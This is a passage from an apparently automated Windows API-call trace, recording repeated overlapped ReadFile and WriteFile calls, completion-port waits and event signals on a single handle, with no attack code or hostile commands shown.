lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.743] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0086.743] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.743] GetCurrentThreadId () returned 0x5b0 [0086.744] SetEvent (hEvent=0x244) returned 1 [0086.744] GetCurrentThreadId () returned 0x5b0 [0086.744] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.744] GetLastError () returned 0x3e5 [0086.744] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.744] GetCurrentThreadId () returned 0x5b0 [0086.744] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0086.744] SetEvent (hEvent=0x2bc) returned 1 [0086.744] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.744] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.745] SetEvent (hEvent=0x25c) returned 1 [0086.745] GetCurrentThreadId () returned 0x5b0 [0086.745] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.745] GetLastError () returned 0x3e5 [0086.745] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.978] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0086.978] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.978] GetCurrentThreadId () returned 0x5b0 [0086.978] SetEvent (hEvent=0x244) returned 1 [0086.978] GetCurrentThreadId () returned 0x5b0 [0086.978] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.978] GetLastError () returned 0x3e5 [0086.979] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.979] GetCurrentThreadId () returned 0x5b0 [0086.979] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0086.979] SetEvent (hEvent=0x2bc) returned 1 [0086.980] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.980] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.981] SetEvent (hEvent=0x25c) returned 1 [0086.981] GetCurrentThreadId () returned 0x5b0 [0086.981] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.981] GetLastError () returned 0x3e5 [0086.981] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.368] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0087.368] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.368] GetCurrentThreadId () returned 0x5b0 [0087.368] SetEvent (hEvent=0x244) returned 1 [0087.368] GetCurrentThreadId () returned 0x5b0 [0087.368] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.368] GetLastError () returned 0x3e5 [0087.368] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.369] GetCurrentThreadId () returned 0x5b0 [0087.369] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0087.369] SetEvent (hEvent=0x2bc) returned 1 [0087.369] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.369] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.370] SetEvent (hEvent=0x25c) returned 1 [0087.370] GetCurrentThreadId () returned 0x5b0 [0087.370] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.370] GetLastError () returned 0x3e5 [0087.370] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.603] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0087.603] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.603] GetCurrentThreadId () returned 0x5b0 [0087.603] SetEvent (hEvent=0x244) returned 1 [0087.603] GetCurrentThreadId () returned 0x5b0 [0087.603] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.603] GetLastError () returned 0x3e5 [0087.603] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.603] GetCurrentThreadId () returned 0x5b0 [0087.604] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0087.604] SetEvent (hEvent=0x2bc) returned 1 [0087.604] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.604] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.604] SetEvent (hEvent=0x25c) returned 1 [0087.605] GetCurrentThreadId () returned 0x5b0 [0087.605] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.605] GetLastError () returned 0x3e5 [0087.605] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.837] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0087.837] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.837] GetCurrentThreadId () returned 0x5b0 [0087.837] SetEvent (hEvent=0x244) returned 1 [0087.837] GetCurrentThreadId () returned 0x5b0 [0087.837] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.837] GetLastError () returned 0x3e5 [0087.837] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.838] GetCurrentThreadId () returned 0x5b0 [0087.838] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0087.838] SetEvent (hEvent=0x2bc) returned 1 [0087.838] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.838] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0087.839] SetEvent (hEvent=0x25c) returned 1 [0087.839] GetCurrentThreadId () returned 0x5b0 [0087.839] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0087.839] GetLastError () returned 0x3e5 [0087.839] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.134] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0088.134] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.134] GetCurrentThreadId () returned 0x5b0 [0088.135] SetEvent (hEvent=0x244) returned 1 [0088.135] GetCurrentThreadId () returned 0x5b0 [0088.135] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.135] GetLastError () returned 0x3e5 [0088.135] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.135] GetCurrentThreadId () returned 0x5b0 [0088.135] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0088.135] SetEvent (hEvent=0x2bc) returned 1 [0088.135] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.135] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.136] SetEvent (hEvent=0x25c) returned 1 [0088.136] GetCurrentThreadId () returned 0x5b0 [0088.136] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.136] GetLastError () returned 0x3e5 [0088.137] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.374] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0088.374] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.374] GetCurrentThreadId () returned 0x5b0 [0088.374] SetEvent (hEvent=0x244) returned 1 [0088.374] GetCurrentThreadId () returned 0x5b0 [0088.374] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.374] GetLastError () returned 0x3e5 [0088.374] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.375] GetCurrentThreadId () returned 0x5b0 [0088.375] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0088.375] SetEvent (hEvent=0x2bc) returned 1 [0088.375] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.375] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.376] SetEvent (hEvent=0x25c) returned 1 [0088.376] GetCurrentThreadId () returned 0x5b0 [0088.376] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.376] GetLastError () returned 0x3e5 [0088.376] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.608] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0088.609] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.609] GetCurrentThreadId () returned 0x5b0 [0088.609] SetEvent (hEvent=0x244) returned 1 [0088.609] GetCurrentThreadId () returned 0x5b0 [0088.609] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.609] GetLastError () returned 0x3e5 [0088.609] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.611] GetCurrentThreadId () returned 0x5b0 [0088.611] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0088.611] SetEvent (hEvent=0x2bc) returned 1 [0088.611] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.611] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.612] SetEvent (hEvent=0x25c) returned 1 [0088.612] GetCurrentThreadId () returned 0x5b0 [0088.612] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.612] GetLastError () returned 0x3e5 [0088.612] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.844] GetCurrentThreadId () returned 0x5b0 [0088.844] SetEvent (hEvent=0x244) returned 1 [0088.844] GetCurrentThreadId () returned 0x5b0 [0088.844] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.845] GetLastError () returned 0x3e5 [0088.845] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.845] GetCurrentThreadId () returned 0x5b0 [0088.845] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0088.845] SetEvent (hEvent=0x2bc) returned 1 [0088.845] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.845] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0088.846] SetEvent (hEvent=0x25c) returned 1 [0088.846] GetCurrentThreadId () returned 0x5b0 [0088.847] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0088.847] GetLastError () returned 0x3e5 [0088.847] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.077] GetCurrentThreadId () returned 0x5b0 [0089.077] SetEvent (hEvent=0x244) returned 1 [0089.077] GetCurrentThreadId () returned 0x5b0 [0089.078] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.078] GetLastError () returned 0x3e5 [0089.078] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.328] GetCurrentThreadId () returned 0x5b0 [0089.328] WriteFile (in: hFile=0x268, lpBuffer=0x2644068, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2644068, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.343] SetEvent (hEvent=0x2a4) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: 